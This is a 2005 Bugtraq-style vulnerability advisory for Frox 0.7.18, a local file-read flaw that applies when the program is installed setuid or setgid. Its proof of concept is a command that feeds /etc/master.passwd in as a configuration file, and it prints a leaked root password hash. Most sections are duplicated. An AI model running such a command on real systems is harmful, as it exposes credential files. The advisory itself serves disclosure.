Frox Arbitrary Configuration File Access Vulnerability
BID:14711
Info
Frox Arbitrary Configuration File Access Vulnerability
| Bugtraq ID: | 14711 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | No |
| Local: | Yes |
| Published: | Sep 01 2005 12:00AM |
| Updated: | Sep 01 2005 12:00AM |
| Credit: | rotor <irc.efnet.org> is credited with the discovery of this vulnerability. |
| Vulnerable: |
frox frox 0.7.18 |
| Not Vulnerable: | |
Discussion
Frox Arbitrary Configuration File Access Vulnerability
Frox is prone to a vulnerability that permits read access to arbitrary files.
Successful exploitation of this vulnerability will grant the attacker read access to arbitrary files on the system in the security context of the Frox process. Information obtained may aid in further attacks against the underlying system; other attacks are also possible.
It should be noted that this issue is only exploitable if Frox is installed with setuid or setgid privileges.
Frox is prone to a vulnerability that permits read access to arbitrary files.
Successful exploitation of this vulnerability will grant the attacker read access to arbitrary files on the system in the security context of the Frox process. Information obtained may aid in further attacks against the underlying system; other attacks are also possible.
It should be noted that this issue is only exploitable if Frox is installed with setuid or setgid privileges.
Exploit / POC
Frox Arbitrary Configuration File Access Vulnerability
No exploit is required.
The following proof of concept is available:
mq(/usr/local/sbin)-> frox -f /etc/master.passwd
Unrecognised option
"root:$2a$04$nR2msaB9.nAgR4qI6pqBNOQbH6LoqALZTmqsqhGEJLLwyTfsxXTd.:0:0::0:0:Charlie"
at line 3 of /etc/master.passwd
Error reading configuration file
No exploit is required.
The following proof of concept is available:
mq(/usr/local/sbin)-> frox -f /etc/master.passwd
Unrecognised option
"root:$2a$04$nR2msaB9.nAgR4qI6pqBNOQbH6LoqALZTmqsqhGEJLLwyTfsxXTd.:0:0::0:0:Charlie"
at line 3 of /etc/master.passwd
Error reading configuration file
Solution / Fix
Frox Arbitrary Configuration File Access Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Frox Arbitrary Configuration File Access Vulnerability
References:
References: